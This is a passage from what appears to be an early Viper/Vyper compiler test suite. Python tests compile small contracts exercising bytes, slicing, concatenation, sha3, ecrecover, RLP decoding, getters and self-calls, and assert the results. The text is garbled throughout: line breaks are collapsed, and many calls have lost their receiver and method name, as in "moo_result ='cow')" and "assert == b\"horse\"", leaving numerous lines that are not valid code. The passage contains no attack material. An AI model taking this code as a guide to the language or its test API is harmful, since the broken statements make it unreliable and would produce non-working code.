[1, 2, 3, 4] print('Passed second composite crowdfund test') def test_test_bytes(): test_bytes = """ def foo(x: bytes <= 100) -> bytes <= 100: return x """ c = get_contract(test_bytes) moo_result ='cow') assert moo_result == b'cow' print('Passed basic bytes test') assert'\x35' * 100) == b'\x35' * 100 print('Passed max-length bytes test') try:'\x35' * 101) assert False except: pass print('Passed input-too-long test') def test_test_bytes2(): test_bytes2 = """ def foo(x: bytes <= 100) -> bytes <= 100: y = x return y """ c = get_contract(test_bytes2) assert'cow') == b'cow' assert'') == b'' assert'\x35' * 63) == b'\x35' * 63 assert'\x35' * 64) == b'\x35' * 64 assert'\x35' * 65) == b'\x35' * 65 print('Passed string copying test') def test_test_bytes3(): test_bytes3 = """ x: num maa: bytes <= 60 y: num def __init__(): self.x = 27 self.y = 37 def set_maa(inp: bytes <= 60): self.maa = inp def set_maa2(inp: bytes <= 60): ay = inp self.maa = ay def get_maa() -> bytes <= 60: return self.maa def get_maa2() -> bytes <= 60: ay = self.maa return ay def get_xy() -> num: return self.x * self.y """ c = get_contract(test_bytes3) c.set_maa(b"pig") assert c.get_maa() == b"pig" assert c.get_maa2() == b"pig" c.set_maa2(b"") assert c.get_maa() == b"" assert c.get_maa2() == b"" c.set_maa(b"\x44" * 60) assert c.get_maa() == b"\x44" * 60 assert c.get_maa2() == b"\x44" * 60 c.set_maa2(b"mongoose") assert c.get_maa() == b"mongoose" assert c.get_xy() == 999 print('Passed advanced string copying test') def test_test_bytes4(): test_bytes4 = """ a: bytes <= 60 def foo(inp: bytes <= 60) -> bytes <= 60: self.a = inp self.a = None return self.a def bar(inp: bytes <= 60) -> bytes <= 60: b = inp b = None return b """ c = get_contract(test_bytes4) assert == b"", assert == b"" print('Passed string deleting test') def test_test_bytes5(): test_bytes5 = """ g: {a: bytes <= 50, b: bytes <= 50} def foo(inp1: bytes <= 40, inp2: bytes <= 45): self.g = {a: inp1, b: inp2} def check1() -> bytes <= 50: return self.g.a def check2() -> bytes <= 50: return self.g.b def bar(inp1: bytes <= 40, inp2: bytes <= 45) -> bytes <= 50: h = {a: inp1, b: inp2} return h.a def bat(inp1: bytes <= 40, inp2: bytes <= 45) -> bytes <= 50: h = {a: inp1, b: inp2} return h.b def quz(inp1: bytes <= 40, inp2: bytes <= 45): h = {a: inp1, b: inp2} self.g = h """ c = get_contract(test_bytes5)"cow", b"horse") assert c.check1() == b"cow" assert c.check2() == b"horse" assert"pig", b"moose") == b"pig" assert c.bat(b"pig", b"moose") == b"moose" c.quz(b"badminton", b"fluffysheep") assert c.check1() == b"badminton" assert c.check2() == b"fluffysheep" print('Passed string struct test') def test_test_slice(): test_slice = """ def foo(inp1: bytes <= 10) -> bytes <= 3: x = 5 s = slice(inp1, start=3, len=3) y = 7 return s def bar(inp1: bytes <= 10) -> num: x = 5 s = slice(inp1, start=3, len=3) y = 7 return x * y """ c = get_contract(test_slice) x ="badminton") assert x == b"min", x assert"badminton") == 35 print('Passed slice test') def test_test_slice2(): test_slice2 = """ def slice_tower_test(inp1: bytes <= 50) -> bytes <= 50: inp = inp1 for i in range(1, 11): inp = slice(inp, start=1, len=30 - i * 2) return inp """ c = get_contract_with_gas_estimation(test_slice2) x = c.slice_tower_test(b"abcdefghijklmnopqrstuvwxyz1234") assert x == b"klmnopqrst", x print('Passed advanced slice test') def test_test_slice3(): test_slice3 = """ x: num s: bytes <= 50 y: num def foo(inp1: bytes <= 50) -> bytes <= 50: self.x = 5 self.s = slice(inp1, start=3, len=3) self.y = 7 return self.s def bar(inp1: bytes <= 50) -> num: self.x = 5 self.s = slice(inp1, start=3, len=3) self.y = 7 return self.x * self.y """ c = get_contract(test_slice3) x ="badminton") assert x == b"min", x assert"badminton") == 35 print('Passed storage slice test') def test_test_slice4(): test_slice4 = """ def foo(inp: bytes <= 10, start: num, len: num) -> bytes <= 10: return slice(inp, start=start, len=len) """ c = get_contract(test_slice4) assert"badminton", 3, 3) == b"min" assert"badminton", 0, 9) == b"badminton" assert"badminton", 1, 8) == b"adminton" assert"badminton", 1, 7) == b"adminto" assert"badminton", 1, 0) == b"" assert"badminton", 9, 0) == b"" try:"badminton", 0, 10) assert False except: pass try:"badminton", 1, 9) assert False except: pass try:"badminton", 9, 1) assert False except: pass try:"badminton", 10, 0) assert False except: pass print('Passed slice edge case test') def test_test_length(): test_length = """ y: bytes <= 10 def foo(inp: bytes <= 10) -> num: x = slice(inp, start=1, len=5) self.y = slice(inp, start=2, len=4) return len(inp) * 100 + len(x) * 10 + len(self.y) """ c = get_contract(test_length) assert"badminton") == 954,"badminton") print('Passed length test') def test_test_concat(): test_concat = """ def foo2(input1: bytes <= 50, input2: bytes <= 50) -> bytes <= 1000: return concat(input1, input2) def foo3(input1: bytes <= 50, input2: bytes <= 50, input3: bytes <= 50) -> bytes <= 1000: return concat(input1, input2, input3) """ c = get_contract(test_concat) assert c.foo2(b"h", b"orse") == b"horse" assert c.foo2(b"h", b"") == b"h" assert c.foo2(b"", b"") == b"" assert c.foo2(b"", b"orse") == b"orse" assert c.foo3(b"Buffalo", b" ", b"buffalo") == b"Buffalo buffalo" assert c.foo2(b"\x36", b"\x35" * 32) == b"\x36" + b"\x35" * 32 assert c.foo2(b"\x36" * 48, b"\x35" * 32) == b"\x36" * 48 + b"\x35" * 32 assert c.foo3(b"horses" * 4, b"mice" * 7, b"crows" * 10) == b"horses" * 4 + b"mice" * 7 + b"crows" * 10 print('Passed simple concat test') def test_test_concat2(): test_concat2 = """ def foo(inp: bytes <= 50) -> bytes <= 1000: x = inp return concat(x, inp, x, inp, x, inp, x, inp, x, inp) """ c = get_contract(test_concat2) assert"horse" * 9 + b"viper") == (b"horse" * 9 + b"viper") * 10 print('Passed second concat test') def test_crazy_concat_code(): crazy_concat_code = """ y: bytes <= 10 def krazykonkat(z: bytes <= 10) -> bytes <= 25: x = "cow" self.y = "horse" return concat(x, " ", self.y, " ", z) """ c = get_contract(crazy_concat_code) assert c.krazykonkat(b"moose") == b'cow horse moose' print('Passed third concat test') def test_string_literal_code(): string_literal_code = """ def foo() -> bytes <= 5: return "horse" def bar() -> bytes <= 10: return concat("b", "a", "d", "m", "i", "", "nton") def baz() -> bytes <= 40: return concat("0123456789012345678901234567890", "12") def baz2() -> bytes <= 40: return concat("01234567890123456789012345678901", "12") def baz3() -> bytes <= 40: return concat("0123456789012345678901234567890", "1") def baz4() -> bytes <= 100: return concat("01234567890123456789012345678901234567890123456789", "01234567890123456789012345678901234567890123456789") """ c = get_contract(string_literal_code) assert == b"horse" assert == b"badminton" assert c.baz() == b"012345678901234567890123456789012" assert c.baz2() == b"0123456789012345678901234567890112" assert c.baz3() == b"01234567890123456789012345678901" assert c.baz4() == b"0123456789" * 10 print("Passed string literal test") def test_kode(): for i in range(95, 96, 97): kode = """ moo: bytes <= 100 def foo(s: num, L: num) -> bytes <= 100: x = 27 r = slice("%s", start=s, len=L) y = 37 if x * y == 999: return r def bar(s: num, L: num) -> bytes <= 100: self.moo = "%s" x = 27 r = slice(self.moo, start=s, len=L) y = 37 if x * y == 999: return r def baz(s: num, L: num) -> bytes <= 100: x = 27 self.moo = slice("%s", start=s, len=L) y = 37 if x * y == 999: return self.moo """ % (("c" * i), ("c" * i), ("c" * i)) c = get_contract(kode) for e in range(63, 64, 65): for _s in range(31, 32, 33): o1 =, e - _s) o2 =, e - _s) o3 = c.baz(_s, e - _s) assert o1 == o2 == o3 == b"c" * (e - _s), (i, _s, e - _s, o1, o2, o3) print("Passed string literal splicing fuzz-test") def test_hash_code(): hash_code = """ def foo(inp: bytes <= 100) -> bytes32: return sha3(inp) def bar() -> bytes32: return sha3("inp") """ c = get_contract(hash_code) for inp in (b"", b"cow", b"s" * 31, b"\xff" * 32, b"\n" * 33, b"g" * 64, b"h" * 65): assert == u.sha3(inp) assert == u.sha3("inp") def test_hash_code2(): hash_code2 = """ def foo(inp: bytes <= 100) -> bool: return sha3(inp) == sha3("badminton") """ c = get_contract(hash_code2) assert"badminto") is False assert"badminton") is True def test_hash_code3(): hash_code3 = """ test: bytes <= 100 def set_test(inp: bytes <= 100): self.test = inp def tryy(inp: bytes <= 100) -> bool: return sha3(inp) == sha3(self.test) def trymem(inp: bytes <= 100) -> bool: x = self.test return sha3(inp) == sha3(x) def try32(inp: bytes32) -> bool: return sha3(inp) == sha3(self.test) """ c = get_contract(hash_code3) c.set_test(b"") assert c.tryy(b"") is True assert c.trymem(b"") is True assert c.tryy(b"cow") is False c.set_test(b"cow") assert c.tryy(b"") is False assert c.tryy(b"cow") is True c.set_test(b"\x35" * 32) assert c.tryy(b"\x35" * 32) is True assert c.trymem(b"\x35" * 32) is True assert c.try32(b"\x35" * 32) is True assert c.tryy(b"\x35" * 33) is False c.set_test(b"\x35" * 33) assert c.tryy(b"\x35" * 32) is False assert c.trymem(b"\x35" * 32) is False assert c.try32(b"\x35" * 32) is False assert c.tryy(b"\x35" * 33) is True print("Passed SHA3 hash test") def test_method_id_test(): method_id_test = """ def double(x: num) -> num: return x * 2 def returnten() -> num: ans = raw_call(self, concat(method_id("double(int128)"), as_bytes32(5)), gas=50000, outsize=32) return as_num128(extract32(ans, 0)) """ c = get_contract(method_id_test) assert c.returnten() == 10 print("Passed method ID test") def test_ecrecover_test(): ecrecover_test = """ def test_ecrecover(h: bytes32, v:num256, r:num256, s:num256) -> address: return ecrecover(h, v, r, s) def test_ecrecover2() -> address: return ecrecover(0x3535353535353535353535353535353535353535353535353535353535353535, as_num256(28), as_num256(63198938615202175987747926399054383453528475999185923188997970550032613358815), as_num256(6577251522710269046055727877571505144084475024240851440410274049870970796685)) """ c = get_contract(ecrecover_test) h = b'\x35' * 32 k = b'\x46' * 32 v, r, S = u.ecsign(h, k) assert c.test_ecrecover(h, v, r, S) == '0x' + u.encode_hex(u.privtoaddr(k)) assert c.test_ecrecover2() == '0x' + u.encode_hex(u.privtoaddr(k)) print("Passed ecrecover test") def test_extract32_code(): extract32_code = """ y: bytes <= 100 def extrakt32(inp: bytes <= 100, index: num) -> bytes32: return extract32(inp, index) def extrakt32_mem(inp: bytes <= 100, index: num) -> bytes32: x = inp return extract32(x, index) def extrakt32_storage(index: num, inp: bytes <= 100) -> bytes32: self.y = inp return extract32(self.y, index) """ c = get_contract_with_gas_estimation(extract32_code) test_cases = ( (b"c" * 31, 0), (b"c" * 32, 0), (b"c" * 32, -1), (b"c" * 33, 0), (b"c" * 33, 1), (b"c" * 33, 2), (b"cow" * 30, 0), (b"cow" * 30, 1), (b"cow" * 30, 31), (b"cow" * 30, 32), (b"cow" * 30, 33), (b"cow" * 30, 34), (b"cow" * 30, 58), (b"cow" * 30, 59), ) for S, i in test_cases: expected_result = S[i: i + 32] if 0 <= i <= len(S) - 32 else None if expected_result is None: try: o = c.extrakt32(S, i) success = True except: success = False assert not success else: assert c.extrakt32(S, i) == expected_result assert c.extrakt32_mem(S, i) == expected_result assert c.extrakt32_storage(i, S) == expected_result print("Passed bytes32 extraction test") def test_test_concat_bytes32(): test_concat_bytes32 = """ def sandwich(inp: bytes <= 100, inp2: bytes32) -> bytes <= 164: return concat(inp2, inp, inp2) def fivetimes(inp: bytes32) -> bytes <= 160: return concat(inp, inp, inp, inp, inp) """ c = get_contract(test_concat_bytes32) assert c.sandwich(b"cow", b"\x35" * 32) == b"\x35" * 32 + b"cow" + b"\x35" * 32, c.sandwich(b"cow", b"\x35" * 32) assert c.sandwich(b"", b"\x46" * 32) == b"\x46" * 64 assert c.sandwich(b"\x57" * 95, b"\x57" * 32) == b"\x57" * 159 assert c.sandwich(b"\x57" * 96, b"\x57" * 32) == b"\x57" * 160 assert c.sandwich(b"\x57" * 97, b"\x57" * 32) == b"\x57" * 161 assert c.fivetimes(b"mongoose" * 4) == b"mongoose" * 20 print("Passed concat bytes32 test") def test_test_wei(): test_wei = """ def return_2_finney() -> wei_value: return as_wei_value(2, finney) def return_3_finney() -> wei_value: return as_wei_value(2 + 1, finney) def return_2p5_ether() -> wei_value: return as_wei_value(2.5, ether) def return_3p5_ether() -> wei_value: return as_wei_value(2.5 + 1, ether) def return_2pow64_wei() -> wei_value: return as_wei_value(18446744.073709551616, szabo) """ c = get_contract_with_gas_estimation(test_wei) assert c.return_2_finney() == 2 * 10**15 assert c.return_3_finney() == 3 * 10**15, c.return_3_finney() assert c.return_2p5_ether() == 2.5 * 10**18 assert c.return_3p5_ether() == 3.5 * 10**18 assert c.return_2pow64_wei() == 2**64 print("Passed wei value literals test") def test_caller_code(): caller_code = """ def foo() -> bytes <= 7: return raw_call(0x0000000000000000000000000000000000000004, "moose", gas=50000, outsize=5) def bar() -> bytes <= 7: return raw_call(0x0000000000000000000000000000000000000004, "moose", gas=50000, outsize=3) def baz() -> bytes <= 7: return raw_call(0x0000000000000000000000000000000000000004, "moose", gas=50000, outsize=7) """ c = get_contract(caller_code) assert == b"moose" assert == b"moo" assert c.baz() == b"moose\x00\x00" print('Passed raw call test') def test_extract32_code(): extract32_code = """ def foo(inp: bytes <= 32) -> num: return extract32(inp, 0, type=num128) def bar(inp: bytes <= 32) -> num256: return extract32(inp, 0, type=num256) def baz(inp: bytes <= 32) -> bytes32: return extract32(inp, 0, type=bytes32) def fop(inp: bytes <= 32) -> bytes32: return extract32(inp, 0) def foq(inp: bytes <= 32) -> address: return extract32(inp, 0, type=address) """ c = get_contract(extract32_code) assert"\x00" * 30 + b"\x01\x01") == 257 assert"\x00" * 30 + b"\x01\x01") == 257 try:"\x80" + b"\x00" * 30) success = True except: success = False assert not success assert"\x80" + b"\x00" * 31) == 2**255 assert c.baz(b"crow" * 8) == b"crow" * 8 assert c.fop(b"crow" * 8) == b"crow" * 8 assert c.foq(b"\x00" * 12 + b"3" * 20) == "0x" + "3" * 40 try: c.foq(b"crow" * 8) success = True except: success = False assert not success print('Passed extract32 test') def test_bytes_to_num_code(): bytes_to_num_code = """ def foo(x: bytes <= 32) -> num: return bytes_to_num(x) """ c = get_contract(bytes_to_num_code) assert"") == 0 try:"\x00") success = True except: success = False assert not success assert"\x01") == 1 try:"\x00\x01") success = True except: success = False assert not success assert"\x01\x00") == 256 assert"\x01\x00\x00\x00\x01") == 4294967297 assert"\xff" * 32) == -1 try:"\x80" + b"\xff" * 31) success = True except: success = False try:"\x01" * 33) success = True except: success = False print('Passed bytes_to_num tests') def test_rlp_decoder_code(): import rlp rlp_decoder_code = """ u: bytes <= 100 def foo() -> address: x = RLPList('\xf6\x9455555555555555555555\xa0GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG', [address, bytes32]) return x[0] def fop() -> bytes32: x = RLPList('\xf6\x9455555555555555555555\xa0GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG', [address, bytes32]) return x[1] def foq() -> bytes <= 100: x = RLPList('\xc5\x83cow\x03', [bytes, num]) return x[0] def fos() -> num: x = RLPList('\xc5\x83cow\x03', [bytes, num]) return x[1] def fot() -> num256: x = RLPList('\xc5\x83cow\x03', [bytes, num256]) return x[1] def qoo(inp: bytes <= 100) -> address: x = RLPList(inp, [address, bytes32]) return x[0] def qos(inp: bytes <= 100) -> num: x = RLPList(inp, [num, num]) return x[0] + x[1] def qot(inp: bytes <= 100): x = RLPList(inp, [num, num]) def qov(inp: bytes <= 100): x = RLPList(inp, [num256, num256]) def roo(inp: bytes <= 100) -> address: self.u = inp x = RLPList(self.u, [address, bytes32]) return x[0] def too(inp: bytes <= 100) -> bool: x = RLPList(inp, [bool]) return x[0] def voo(inp: bytes <= 1024) -> num: x = RLPList(inp, [num, num, bytes32, num, bytes32, bytes]) return x[1] """ c = get_contract(rlp_decoder_code) assert == '0x' + '35' * 20 assert c.fop() == b'G' * 32 assert c.foq() == b'cow' assert c.fos() == 3 assert c.fot() == 3 assert c.qoo(b'\xf6\x9455555555555555555555\xa0GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG') == '0x' + '35' * 20 assert c.roo(b'\xf6\x9455555555555555555555\xa0GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG') == '0x' + '35' * 20 assert c.qos(rlp.encode([3, 30])) == 33 assert c.qos(rlp.encode([3, 2**100 - 5])) == 2**100 - 2 assert c.voo(rlp.encode([b'', b'\x01', b'\xbds\xc31\xf5=b\xa5\xcfy]\x0f\x05\x8f}\\\xf3\xe6\xea\x9d~\r\x96\xda\xdf:+\xdb4pm\xcc', b'', b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b:\xcd\x85\x9b\x84`FD\xf9\xa8'\x8ezR\xd5\xc9*\xf5W\x1f\x14\xc2\x0cd\xa0\x17\xd4Z\xde\x9d\xc2\x18_\x82B\xc2\xaa\x82\x19P\xdd\xa2\xd0\xe9(\xcaO\xe2\xb1\x13s\x05yS\xc3q\xdb\x1eB\xe2g\xaa'\xba"])) == 1 try: c.qot(rlp.encode([7, 2**160])) success = True except: success = False assert not success c.qov(rlp.encode([7, 2**160])) try: c.qov(rlp.encode([2**160])) success = True except: success = False assert not success try: c.qov(rlp.encode([b'\x03', b'\x00\x01'])) success = True except: success = False assert not success c.qov(rlp.encode([b'\x03', b'\x01'])) c.qov(rlp.encode([b'\x03', b''])) try: c.qov(rlp.encode([b'\x03', b'\x00'])) success = True except: success = False assert not success assert c.too(rlp.encode([b'\x01'])) is True assert c.too(rlp.encode([b''])) is False try: c.too(rlp.encode([b'\x02'])) success = True except: success = False assert not success try: c.too(rlp.encode([b'\x00'])) success = True except: success = False assert not success print('Passed RLP decoder tests') def test_getter_code(): getter_code = """ x: public(wei_value) y: public(num[5]) z: public(bytes <= 100) w: public({ a: wei_value, b: num[7], c: bytes <= 100, d: num[address], e: num[3][3], f: timestamp, g: wei_value }[num]) def __init__(): self.x = as_wei_value(7, wei) self.y[1] = 9 self.z = "cow" self.w[1].a = 11 self.w[1].b[2] = 13 self.w[1].c = "horse" self.w[1].d[0x1234567890123456789012345678901234567890] = 15 self.w[2].e[1][2] = 17 self.w[3].f = 750 self.w[3].g = 751 """ c = get_contract(getter_code) assert c.get_x() == 7 assert c.get_y(1) == 9 assert c.get_z() == b"cow" assert c.get_w__a(1) == 11 assert c.get_w__b(1, 2) == 13 assert c.get_w__c(1) == b"horse" assert c.get_w__d(1, "0x1234567890123456789012345678901234567890") == 15 assert c.get_w__e(2, 1, 2) == 17 assert c.get_w__f(3) == 750 assert c.get_w__g(3) == 751 print('Passed getter tests') def test_konkat_code(): konkat_code = """ ecks: bytes32 def foo(x: bytes32, y: bytes32) -> bytes <= 64: selfecks = x return concat(selfecks, y) def goo(x: bytes32, y: bytes32) -> bytes <= 64: self.ecks = x return concat(self.ecks, y) def hoo(x: bytes32, y: bytes32) -> bytes <= 64: return concat(x, y) """ c = get_contract(konkat_code) assert'\x35' * 32, b'\x00' * 32) == b'\x35' * 32 + b'\x00' * 32 assert'\x35' * 32, b'\x00' * 32) == b'\x35' * 32 + b'\x00' * 32 assert c.hoo(b'\x35' * 32, b'\x00' * 32) == b'\x35' * 32 + b'\x00' * 32 print('Passed second concat tests') def test_conditional_return_code(): conditional_return_code = """ def foo(i: bool) -> num: if i: return 5 else: assert 2 return 7 return 11 """ c = get_contract_with_gas_estimation(conditional_return_code) assert == 5 assert == 7 print('Passed conditional return tests') def test_large_input_code(): large_input_code = """ def foo(x: num) -> num: return 3 """ c = get_contract_with_gas_estimation(large_input_code)**120) try:**130) success = True except: success = False assert not success def test_large_input_code_2(): large_input_code_2 = """ def __init__(x: num): y = x def foo() -> num: return 5 """ c = get_contract(large_input_code_2, args=[17], sender=t.k0, value=0) try: c = get_contract(large_input_code_2, args=[2**130], sender=t.k0, value=0) success = True except: success = False assert not success print('Passed invalid input tests') def test_loggy_code(): loggy_code = """ s: bytes <= 100 def foo(): raw_log([], "moo") def goo(): raw_log([0x1234567812345678123456781234567812345678123456781234567812345678], "moo2") def hoo(): self.s = "moo3" raw_log([], self.s) def ioo(inp: bytes <= 100): raw_log([], inp) """ c = get_contract(loggy_code) assert s.head_state.receipts[-1].logs[0].data == b'moo' assert s.head_state.receipts[-1].logs[0].data == b'moo2' assert s.head_state.receipts[-1].logs[0].topics == [0x1234567812345678123456781234567812345678123456781234567812345678] c.hoo() assert s.head_state.receipts[-1].logs[0].data == b'moo3' c.ioo(b"moo4") assert s.head_state.receipts[-1].logs[0].data == b'moo4' print("Passed raw log tests") def test_test_bitwise(): test_bitwise = """ def _bitwise_and(x: num256, y: num256) -> num256: return bitwise_and(x, y) def _bitwise_or(x: num256, y: num256) -> num256: return bitwise_or(x, y) def _bitwise_xor(x: num256, y: num256) -> num256: return bitwise_xor(x, y) def _bitwise_not(x: num256) -> num256: return bitwise_not(x) def _shift(x: num256, y: num) -> num256: return shift(x, y) """ c = get_contract(test_bitwise) x = 126416208461208640982146408124 y = 7128468721412412459 assert c._bitwise_and(x, y) == (x & y) assert c._bitwise_or(x, y) == (x | y) assert c._bitwise_xor(x, y) == (x ^ y) assert c._bitwise_not(x) == 2**256 - 1 - x assert c._shift(x, 3) == x * 8 assert c._shift(x, 255) == 0 assert c._shift(y, 255) == 2**255 assert c._shift(x, 256) == 0 assert c._shift(x, 0) == x assert c._shift(x, -1) == x // 2 assert c._shift(x, -3) == x // 8 assert c._shift(x, -256) == 0 print("Passed bitwise operation tests") def test_num256_code(): num256_code = """ def _num256_add(x: num256, y: num256) -> num256: return num256_add(x, y) def _num256_sub(x: num256, y: num256) -> num256: return num256_sub(x, y) def _num256_mul(x: num256, y: num256) -> num256: return num256_mul(x, y) def _num256_div(x: num256, y: num256) -> num256: return num256_div(x, y) def _num256_gt(x: num256, y: num256) -> bool: return num256_gt(x, y) def _num256_ge(x: num256, y: num256) -> bool: return num256_ge(x, y) def _num256_lt(x: num256, y: num256) -> bool: return num256_lt(x, y) def _num256_le(x: num256, y: num256) -> bool: return num256_le(x, y) """ c = get_contract_with_gas_estimation(num256_code) x = 126416208461208640982146408124 y = 7128468721412412459 assert c._num256_add(x, y) == x + y assert c._num256_sub(x, y) == x - y assert c._num256_sub(y, x) == 2**256 + y - x assert c._num256_mul(x, y) == x * y assert c._num256_mul(2**128, 2**128) == 0 assert c._num256_div(x, y) == x // y assert c._num256_div(y, x) == 0 assert c._num256_gt(x, y) is True assert c._num256_ge(x, y) is True assert c._num256_le(x, y) is False assert c._num256_lt(x, y) is False assert c._num256_gt(x, x) is False assert c._num256_ge(x, x) is True assert c._num256_le(x, x) is True assert c._num256_lt(x, x) is False assert c._num256_lt(y, x) is True print("Passed num256 operation tests") def test_selfcall_code(): selfcall_code = """ def foo() -> num: return 3 def bar() -> num: return """ c = get_contract(selfcall_code) assert == 3 print("Passed no-argument self-call test") def test_selfcall_code_2(): selfcall_code_2 = """ def double(x: num) -> num: return x * 2 def returnten() -> num: return self.double(5) def _hashy(x: bytes32) -> bytes32: return sha3(x) def return_hash_of_rzpadded_cow() -> bytes32: return self._hashy(0x636f770000000000000000000000000000000000000000000000000000000000) """ c = get_contract(selfcall_code_2) assert c.returnten() == 10 assert c.return_hash_of_rzpadded_cow() == u.sha3(b'cow' + b'\x00' * 29) print("Passed single fixed-size argument self-call test") def test_selfcall_code_3(): selfcall_code_3 = """ def _hashy2(x: bytes <= 100) -> bytes32: return sha3(x) def return_hash_of_cow_x_30() -> bytes32: return self._hashy2("cowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcow") def _len(x: bytes <= 100) -> num: return len(x) def returnten() -> num: return self._len("badminton!") """ c = get_contract(selfcall_code_3) assert c.return_hash_of_cow_x_30() == u.sha3(b'cow' * 30) assert c.returnten() == 10 print("Passed single variable-size argument self-call test") def test_selfcall_code_4(): selfcall_code_4 = """ def summy(x: num, y: num) -> num: return x + y def catty(x: bytes <= 5, y: bytes <= 5) -> bytes <= 10: return concat(x, y) def slicey1(x: bytes <= 10, y: num) -> bytes <= 10: return slice(x, start=0, len=y) def slicey2(y: num, x: bytes <= 10) -> bytes <= 10: return slice(x, start=0, len=y) def returnten() -> num: return self.summy(3, 7) def return_mongoose() -> bytes <= 10: return self.catty("mon", "goose") def return_goose() -> bytes <= 10: return self.slicey1("goosedog", 5) def return_goose2() -> bytes <= 10: return self.slicey2(5, "goosedog") """ c = get_contract(selfcall_code_4) assert c.returnten() == 10 assert c.return_mongoose() == b"mongoose" assert c.return_goose() == b"goose" assert c.return_goose2() == b"goose" print("Passed multi-argument self-call test") def test_selfcall_code_5(): selfcall_code_5 = """ counter: num def increment(): self.counter += 1 def returnten() -> num: for i in range(10): self.increment() return self.counter """ c = get_contract(selfcall_code_5) assert c.returnten() == 10 print("Passed self-call statement test") def test_selfcall_code_6(): selfcall_code_6 = """ excls: bytes <= 32 def set_excls(arg: bytes <= 32): self.excls = arg def underscore() -> bytes <= 1: return "_" def hardtest(x: bytes <= 100, y: num, z: num, a: bytes <= 100, b: num, c: num) -> bytes <= 201: return concat(slice(x, start=y, len=z), self.underscore(), slice(a, start=b, len=c)) def return_mongoose_revolution_32_excls() -> bytes <= 201: self.set_excls("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!") return self.hardtest("megamongoose123", 4, 8, concat("russian revolution", self.excls), 8, 42) """ c = get_contract(selfcall_code_6) assert c.return_mongoose_revolution_32_excls() == b"mongoose_revolution" + b"!" * 32 print("Passed composite self-call test") def test_clamper_test_code(): clamper_test_code = """ def foo(s: bytes <= 3) -> bytes <= 3: return s """ c = get_contract(clamper_test_code, value=1) assert"ca") == b"ca" assert"cat") == b"cat" try:"cate") success = True except t.TransactionFailed: success = False assert not success print("Passed bytearray clamping test") def test_multiple_levels(): inner_code = """ def returnten() -> num: return 10 """ c = get_contract(inner_code) outer_code = """ def create_and_call_returnten(inp: address) -> num: x = create_with_code_of(inp) o = extract32(raw_call(x, "\xd0\x1f\xb1\xb8", outsize=32, gas=50000), 0, type=num128) return o def create_and_return_forwarder(inp: address) -> address: return create_with_code_of(inp) """ c2 = get_contract(outer_code) assert c2.create_and_call_returnten(c.address) == 10 expected_forwarder_code_mask = b'`.`\x0c`\x009`.`\x00\xf36`\x00`\x007a\x10\x00`\x006`\x00s\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00Z\xf4\x15XWa\x10\x00`\x00\xf3'[12:] c3 = c2.create_and_return_forwarder(c.address) assert s.head_state.get_code(c3)[:15] == expected_forwarder_code_mask[:15] assert s.head_state.get_code(c3)[35:] == expected_forwarder_code_mask[35:] print('Passed forwarder test') # TODO: This one is special print('Gas consumed: %d' % (s.head_state.receipts[-1].gas_used - s.head_state.receipts[-2].gas_used - s.last_tx.intrinsic_gas_used)) def test_multiple_levels2(): inner_code = """ def returnten() -> num: assert False return 10 """ c = get_contract_with_gas_estimation(inner_code) outer_code = """ def create_and_call_returnten(inp: address) -> num: x = create_with_code_of(inp) o = extract32(raw_call(x, "\xd0\x1f\xb1\xb8", outsize=32, gas=50000), 0, type=num128) return o def create_and_return_forwarder(inp: address) -> address: return create_with_code_of(inp) """ c2 = get_contract_with_gas_estimation(outer_code) try: c2.create_and_call_returnten(c.address) success = True except: success = False assert not success print('Passed forwarder exception test') def test_list_tester_code(): list_tester_code = """ z: num[3] z2: num[2][2] z3: num[2] def foo(x: num[3]) -> num: return x[0] + x[1] + x[2] def goo(x: num[2][2]) -> num: return x[0][0] + x[0][1] + x[1][0] * 10 + x[1][1] * 10 def hoo(x: num[3]) -> num: y = x return y[0] + x[1] + y[2] def joo(x: num[2][2]) -> num: y = x y2 = x[1] return y[0][0] + y[0][1] + y2[0] * 10 + y2[1] * 10 def koo(x: num[3]) -> num: self.z = x return self.z[0] + x[1] + self.z[2] def loo(x: num[2][2]) -> num: self.z2 = x self.z3 = x[1] return self.z2[0][0] + self.z2[0][1] + self.z3[0] * 10 + self.z3[1] * 10 """ c = get_contract(list_tester_code) assert[3,4,5]) == 12 assert[[1,2],[3,4]]) == 73 assert c.hoo([3,4,5]) == 12 assert c.joo([[1,2],[3,4]]) == 73 assert c.koo([3,4,5]) == 12 assert c.loo([[1,2],[3,4]]) == 73 print("Passed list tests") def test_list_output_tester_code(): list_output_tester_code = """ z: num[2] def foo() -> num[2]: return [3, 5] def goo() -> num[2]: x = [3, 5] return x def hoo() -> num[2]: self.z = [3, 5] return self.z def joo() -> num[2]: self.z = [3, 5] x = self.z return x def koo() -> num[2][2]: return [[1,2],[3,4]] def loo() -> num[2][2]: x = [[1,2],[3,4]] return x def moo() -> num[2][2]: x = [1,2] return [x,[3,4]] def noo(inp: num[2]) -> num[2]: return inp def poo(inp: num[2][2]) -> num[2][2]: return inp def qoo(inp: num[2]) -> num[2][2]: return [inp,[3,4]] def roo(inp: num[2]) -> decimal[2][2]: return [inp,[3,4]] """ c = get_contract(list_output_tester_code) assert == [3,5] assert == [3,5] assert c.hoo() == [3,5] assert c.joo() == [3,5] assert c.koo() == [[1,2],[3,4]] assert c.loo() == [[1,2],[3,4]] assert c.moo() == [[1,2],[3,4]] assert c.noo([3,5]) == [3,5] assert c.poo([[1,2],[3,4]]) == [[1,2],[3,4]] assert c.qoo([1,2]) == [[1,2],[3,4]] assert c.roo([1,2]) == [[1.0,2.0],[3.0,4.0]] print("Passed list output tests") def test_internal_test(): internal_test = """ @internal def a() -> num: return 5 def returnten() -> num: return self.a() * 2 """ c = get_contract(internal_test) assert c.returnten() == 10 print("Passed internal function test") def test_minmax(): minmax_test = """ def foo() -> decimal: return min(3, 5) + 